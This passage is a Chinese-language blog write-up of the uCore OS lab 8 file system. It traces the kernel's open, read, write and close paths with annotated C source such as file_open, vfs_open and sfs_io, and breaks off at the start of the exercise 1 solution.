文件打开流程</h4><ul><li><p>用户进程调用<code>open</code>函数时，通过系统中断调用内核中的<code>sysfile_open</code>函数，并进一步调用<code>file_open</code>函数。在<code>file_open</code>函数中，程序主要做了以下几个操作：</p><ul><li>在当前进程的文件管理结构<code>filesp</code>中，获取一个空闲的<code>file</code>对象。</li><li>调用<code>vfs_open</code>函数，并存储该函数返回的<code>inode</code>结构</li><li>根据上一步返回的<code>inode</code>，设置<code>file</code>对象的属性。如果打开方式是<code>append</code>，则还会设置<code>file</code>的<code>pos</code>成员为当前文件的大小。</li><li>最后返回<code>file-&gt;fd</code></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// open file</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">file_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> readable = <span class="number">0</span>, writable = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">switch</span> (open_flags &amp; O_ACCMODE) &#123;</span><br><span class="line">    <span class="keyword">case</span> O_RDONLY: readable = <span class="number">1</span>; <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> O_WRONLY: writable = <span class="number">1</span>; <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> O_RDWR:</span><br><span class="line">        readable = writable = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *file;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">fd_array_alloc</span>(NO_FD, &amp;file)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">vfs_open</span>(path, open_flags, &amp;node)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fd_array_free</span>(file);</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    file-&gt;pos = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (open_flags &amp; O_APPEND) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">stat</span> __stat, *stat = &amp;__stat;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vop_fstat</span>(node, stat)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">vfs_close</span>(node);</span><br><span class="line">            <span class="built_in">fd_array_free</span>(file);</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        &#125;</span><br><span class="line">        file-&gt;pos = stat-&gt;st_size;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    file-&gt;node = node;</span><br><span class="line">    file-&gt;readable = readable;</span><br><span class="line">    file-&gt;writable = writable;</span><br><span class="line">    <span class="built_in">fd_array_open</span>(file);</span><br><span class="line">    <span class="keyword">return</span> file-&gt;fd;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>vfs_open</code>函数主要完成以下操作：</p><ul><li><p>调用<code>vfs_lookup</code>搜索给出的路径，判断是否存在该文件。如果存在，则<code>vfs_lookup</code>函数返回该文件所对应的<code>inode</code>节点至当前函数<code>vfs_open</code>中的局部变量<code>node</code>。</p></li><li><p>如果给出的路径不存在，即文件不存在，则根据传入的flag，选择调用<code>vop_create</code>创建新文件或直接返回错误信息。</p><blockquote><p><code>vop_creat</code>所对应的<code>SFS</code>创建文件函数似乎没实现？</p></blockquote></li><li><p>执行到此步时，当前函数中的局部变量<code>node</code>一定非空，此时进一步调用<code>vop_open</code>函数打开文件。</p><blockquote><p>SFS中，<code>vop_open</code>所对应的<code>sfs_openfile</code>不执行任何操作，但该接口仍然需要保留。</p></blockquote></li><li><p>如果文件打开正常，则根据当前函数传入的<code>open_flags</code>参数来判断是否需要将当前文件截断（truncate）至0（即<strong>清空</strong>）。如果需要截断，则执行<code>vop_truncate</code>函数。最后函数返回。</p></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// open file in vfs, get/create inode for file with filename path.</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">vfs_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags, <span class="keyword">struct</span> inode **node_store)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> can_write = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">switch</span> (open_flags &amp; O_ACCMODE) &#123;</span><br><span class="line">    <span class="keyword">case</span> O_RDONLY:</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> O_WRONLY:</span><br><span class="line">    <span class="keyword">case</span> O_RDWR:</span><br><span class="line">        can_write = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (open_flags &amp; O_TRUNC) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!can_write) &#123;</span><br><span class="line">            <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span class="type">bool</span> excl = (open_flags &amp; O_EXCL) != <span class="number">0</span>;</span><br><span class="line">    <span class="type">bool</span> create = (open_flags &amp; O_CREAT) != <span class="number">0</span>;</span><br><span class="line">    ret = <span class="built_in">vfs_lookup</span>(path, &amp;node);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (ret != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (ret == <span class="number">-16</span> &amp;&amp; (create)) &#123;</span><br><span class="line">            <span class="type">char</span> *name;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">inode</span> *dir;</span><br><span class="line">            <span class="keyword">if</span> ((ret = <span class="built_in">vfs_lookup_parent</span>(path, &amp;dir, &amp;name)) != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> ret;</span><br><span class="line">            &#125;</span><br><span class="line">            ret = <span class="built_in">vop_create</span>(dir, name, excl, &amp;node);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">return</span> ret;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (excl &amp;&amp; create) &#123;</span><br><span class="line">        <span class="keyword">return</span> -E_EXISTS;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">assert</span>(node != <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">vop_open</span>(node, open_flags)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">vop_ref_dec</span>(node);</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">vop_open_inc</span>(node);</span><br><span class="line">    <span class="keyword">if</span> (open_flags &amp; O_TRUNC || create) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vop_truncate</span>(node, <span class="number">0</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">vop_open_dec</span>(node);</span><br><span class="line">            <span class="built_in">vop_ref_dec</span>(node);</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    *node_store = node;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>文件打开操作到这里就差不多结束了，不过我们可以探讨一下文件是如何进行路径查找以及清空当前文件的。</p><ul><li><p><code>vfs_lookup</code>用于查找传入的路径，并返回其对应的<code>inode</code>结点。</p><ul><li><p>该函数首先调用<code>get_device</code>函数获取设备的<code>inode</code>结点。在<code>get_device</code>函数中，程序会分析传入的<code>path</code>结构并执行不同的函数。传入的<code>path</code>与对应的操作有以下三种，分别是</p><ul><li><p><code>directory/filename</code>： 相对路径。此时会进一步调用<code>vfs_get_curdir</code>，并最终获取到当前进程的工作路径并返回对应的<code>inode</code>。</p></li><li><p><code>/directory/filename</code>或者<code>:directory/filename</code>：无设备指定的绝对路径。</p><ul><li><p>若路径为<code>/directory/filename</code>，此时返回<code>bootfs</code>根目录所对应的<code>inode</code>。</p><blockquote><p><code>bootfs</code>是内核启动盘所对应的文件系统。</p></blockquote></li><li><p>若路径为<code>:/directory/filename</code>，则获取当前进程工作目录所对应的文件系统根目录，并返回其<code>inode</code>数据。</p></li></ul></li><li><p><code>device:directory/filename</code>或者<code>device:/directory/filename</code>： 指定设备的绝对路径。返回所指定设备根目录的对应<code>inode</code>。</p></li></ul><blockquote><p>总的来说，<code>get_device</code>返回的是一个目录<code>inode</code>结点。</p></blockquote><p><code>get_device</code>函数代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * get_device- Common code to pull the device name, if any, off the front of a</span></span><br><span class="line"><span class="comment"> *             path and choose the inode to begin the name lookup relative to.</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">get_device</span><span class="params">(<span class="type">char</span> *path, <span class="type">char</span> **subpath, <span class="keyword">struct</span> inode **node_store)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> i, slash = <span class="number">-1</span>, colon = <span class="number">-1</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; path[i] != <span class="string">&#x27;\0&#x27;</span>; i ++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (path[i] == <span class="string">&#x27;:&#x27;</span>) &#123; colon = i; <span class="keyword">break</span>; &#125;</span><br><span class="line">        <span class="keyword">if</span> (path[i] == <span class="string">&#x27;/&#x27;</span>) &#123; slash = i; <span class="keyword">break</span>; &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (colon &lt; <span class="number">0</span> &amp;&amp; slash != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">/* *</span></span><br><span class="line"><span class="comment">         * No colon before a slash, so no device name specified, and the slash isn&#x27;t leading</span></span><br><span class="line"><span class="comment">         * or is also absent, so this is a relative path or just a bare filename. Start from</span></span><br><span class="line"><span class="comment">         * the current directory, and use the whole thing as the subpath.</span></span><br><span class="line"><span class="comment">         * */</span></span><br><span class="line">        *subpath = path;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">vfs_get_curdir</span>(node_store);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (colon &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">/* device:path - get root of device&#x27;s filesystem */</span></span><br><span class="line">        path[colon] = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* device:/path - skip slash, treat as device:path */</span></span><br><span class="line">        <span class="keyword">while</span> (path[++ colon] == <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">          *subpath = path + colon;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">vfs_get_root</span>(path, node_store);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* *</span></span><br><span class="line"><span class="comment">     * we have either /path or :path</span></span><br><span class="line"><span class="comment">     * /path is a path relative to the root of the &quot;boot filesystem&quot;</span></span><br><span class="line"><span class="comment">     * :path is a path relative to the root of the current filesystem</span></span><br><span class="line"><span class="comment">     * */</span></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">if</span> (*path == <span class="string">&#x27;/&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vfs_get_bootfs</span>(node_store)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">assert</span>(*path == <span class="string">&#x27;:&#x27;</span>);</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vfs_get_curdir</span>(&amp;node)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        <span class="comment">/* The current directory may not be a device, so it must have a fs. */</span></span><br><span class="line">        <span class="built_in">assert</span>(node-&gt;in_fs != <span class="literal">NULL</span>);</span><br><span class="line">        *node_store = <span class="built_in">fsop_get_root</span>(node-&gt;in_fs);</span><br><span class="line">        <span class="built_in">vop_ref_dec</span>(node);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* ///... or :/... */</span></span><br><span class="line">    <span class="keyword">while</span> (*(++ path) == <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">    *subpath = path;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>之后，该函数调用<code>vop_lookup</code>(实际是<code>sfs_lookup</code>)来获取目的结点。</p></li></ul></li><li><p><code>vop_truncate</code>函数（即<code>sfs_truncfile</code>函数）主要完成以下操作</p><ul><li><p>获取该文件原先占用磁盘的块数<code>nblks</code>，以及”截断“后占用的块数<code>tblks</code>。</p><blockquote><p>注意这个截断操作可以向后截断（即缩小文件大小），也可向前截断（即增大文件大小）。这里的”截断“实质上是调整文件尺寸的操作。</p></blockquote></li><li><p>如果原先占用的磁盘块数比目的块数大，则循环调用<code>sfs_bmap_load_nolock</code>函数，单次添加一个块</p></li><li><p>如果原先占用的磁盘块数比目的块数小，则循环调用<code>sfs_bmap_truncate_nolock</code>函数，单次销毁一个块。</p></li></ul><blockquote><p>以上两种操作都需要设置<code>dirtybit</code></p></blockquote></li></ul></li></ul><h4 id="e-文件读取流程">e. 文件读取流程</h4><ul><li><p>用户进程调用<code>read</code>函数时，通过系统中断最终调用<code>sysfile_read</code>。在该函数中，程序主要完成以下几个操作</p><ul><li>测试当前待读取的文件是否存在<strong>读权限</strong></li><li>在内核中创建一块缓冲区。</li><li>循环执行<code>file_read</code>函数读取数据至缓冲区中，并将该缓冲区中的数据复制至用户内存（即传入<code>sysfile_read</code>的base指针所指向的内存）</li></ul></li><li><p><code>file_read</code>函数是内核提供的一项文件读取函数。在这个函数中会涉及到IO缓冲区的数据结构<code>iobuf</code>，其结构如下所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * iobuf is a buffer Rd/Wr status record</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">iobuf</span> &#123;</span><br><span class="line">    <span class="type">void</span> *io_base;     <span class="comment">// IO缓冲区的内存地址</span></span><br><span class="line">    <span class="type">off_t</span> io_offset;   <span class="comment">// 当前读取/写入的地址</span></span><br><span class="line">    <span class="type">size_t</span> io_len;     <span class="comment">// 缓冲区的大小</span></span><br><span class="line">    <span class="type">size_t</span> io_resid;   <span class="comment">// 剩余尚未读取/写入的内存空间.</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>在这个函数中，程序会先初始化一个IO缓冲区，并执行<code>vop_read</code>函数将数据读取至缓冲区中。而<code>vop_read</code>函数会进一步调用<code>sfs_io</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// read file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len, <span class="type">size_t</span> *copied_store)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *file;</span><br><span class="line">    *copied_store = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">fd2file</span>(fd, &amp;file)) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    <span class="keyword">if</span> (!file-&gt;readable)</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    <span class="built_in">fd_array_acquire</span>(file);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">iobuf</span> __iob, *iob = <span class="built_in">iobuf_init</span>(&amp;__iob, base, len, file-&gt;pos);</span><br><span class="line">    ret = <span class="built_in">vop_read</span>(file-&gt;node, iob);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> copied = <span class="built_in">iobuf_used</span>(iob);</span><br><span class="line">    <span class="keyword">if</span> (file-&gt;status == FD_OPENED)</span><br><span class="line">        file-&gt;pos += copied;</span><br><span class="line">    *copied_store = copied;</span><br><span class="line">    <span class="built_in">fd_array_release</span>(file);</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>sfs_io</code>函数是<code>sfs_io_nolock</code>函数的<code>wrapper</code>，该函数将进一步调用<code>sfs_io_nolock</code>。</p><p>这里存在对缓冲区数据的一个跳过，如果当前缓冲区中存在一些数据尚未被读取或写入，则在下一次写入和读取时则会跳过该部分的内存。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * sfs_io - Rd/Wr file. the wrapper of sfs_io_nolock</span></span><br><span class="line"><span class="comment">            with lock protect</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">sfs_io</span><span class="params">(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob, <span class="type">bool</span> write)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_fs</span> *sfs = <span class="built_in">fsop_info</span>(<span class="built_in">vop_fs</span>(node), sfs);</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_inode</span> *sin = <span class="built_in">vop_info</span>(node, sfs_inode);</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="built_in">lock_sin</span>(sin);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">size_t</span> alen = iob-&gt;io_resid;</span><br><span class="line">        ret = <span class="built_in">sfs_io_nolock</span>(sfs, sin, iob-&gt;io_base, iob-&gt;io_offset, &amp;alen, write);</span><br><span class="line">        <span class="comment">// 如果当前缓冲区中存在尚未读取/写入的数据</span></span><br><span class="line">        <span class="comment">// 则跳过该部分数据，写入/读取至该块数据的下一个地址处</span></span><br><span class="line">        <span class="keyword">if</span> (alen != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">iobuf_skip</span>(iob, alen);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">unlock_sin</span>(sin);</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>sfs_io_nolock</code>函数将在练习1中详细讲解。</p></li></ul><h4 id="f-文件写入流程">f. 文件写入流程</h4><p>文件写入流程与文件读取几乎一模一样。文件写入的执行流程是</p><p><code>sysfile_write -&gt; file_write -&gt; vop_write -&gt; sfs_io -&gt; ...</code></p><p>故再此不再赘述</p><h4 id="g-文件关闭流程">g. 文件关闭流程</h4><ul><li><p>首先<code>sysfile_close</code>函数直接调用<code>file_close</code>函数，并在内部调用<code>fd_array_close</code>函数，使得当前<code>file</code>在<code>files_struct</code>中被关闭。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// close file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_close</span><span class="params">(<span class="type">int</span> fd)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *file;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">fd2file</span>(fd, &amp;file)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">fd_array_close</span>(file);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>fd_array_close</code>函数中，如果该文件的打开次数为0，则调用<code>fd_array_free</code>将该文件所占用的资源释放</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fd_array_close - file&#x27;s open_count--; if file&#x27;s open_count-- == 0 , then call fd_array_free to free this file item</span></span><br><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">fd_array_close</span><span class="params">(<span class="keyword">struct</span> file *file)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(file-&gt;status == FD_OPENED);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">fopen_count</span>(file) &gt; <span class="number">0</span>);</span><br><span class="line">    file-&gt;status = FD_CLOSED;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">fopen_count_dec</span>(file) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fd_array_free</span>(file);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>而<code>fd_array_free</code>函数会进一步调用<code>vfs_close</code>。并在内部调用<code>inode_ref_dec</code>和<code>inode_open_dec</code>以递减该文件的引用次数和打开次数。</p><ul><li>当<strong>引用次数</strong>递减为0时，<code>inode_ref_dec</code>内部会调用<code>vop_reclaim</code>（即<code>sfs_reclaim</code>）来释放对应<code>inode</code>结构所涉及的所有数据。</li><li>当<strong>打开次数</strong>递减为0时，<code>inode_open_dec</code>内部会调用<code>vop_close</code>（即<code>sfs_close</code>）来将相关<code>inode</code>写入至磁盘中，并释放结构。</li></ul><blockquote><p>这两个函数对inode的操作稍微有一点点差别，请结合源代码详细理解。</p></blockquote><blockquote><p>不再详细向下写了，内容太多实在写不完了。。。。</p></blockquote></li></ul><h2 id="练习解答">练习解答</h2><h3 id="0-练习0">0) 练习0</h3><blockquote><p>填写已有实验</p></blockquote><p>本次的练习0无需修改其他代码，只要把原先的地方填入lab8代码中即可。</p><h3 id="1-练习1">1) 练习1</h3><blockquote><p><strong>完成读文件操作的实现</strong></p><p>首先了解打开文件的处理流程，然后参考本实验后续的文件读写操作的过程分析，编写在sfs_inode.c中sfs_io_nolock读文件中数据的实现代码。</p></blockquote><p>文件的处理流程请阅读上文<a href="#9-uCore%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%AE%9E%E7%8E%B0">uCore文件系统实现</a></p><p>当进行文件读取/写入操作时，最终uCore都会执行到<code>sfs_io_nolock</code>函数。在该函数中，我们要完成对设备上基础块数据的读取与写入。</p><p>在进行读取/写入前，我们需要先将数据与基础块对齐，以便于使用<code>sfs_block_op</code>函数来操作基础块，提高读取/写入效率。</p><p>但一旦将数据对齐后会存在一个问题：</p><ul><li><p>待操作数据的前一小部分有可能在最前的一个基础块的末尾位置</p></li><li><p>待操作数据的后一小部分有可能在最后的一个基础块的起始位置</p></li></ul><p>我们需要分别对这<strong>第一</strong>和<strong>最后</strong>这两个位置的基础块进行读写/写入，因为<strong>这两个位置的基础块所涉及到的数据都是部分的</strong>。而中间的数据由于已经对齐好基础块了，所以可以直接调用<code>sfs_block_op</code>来读取/写入数据。以下是相关操作的实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 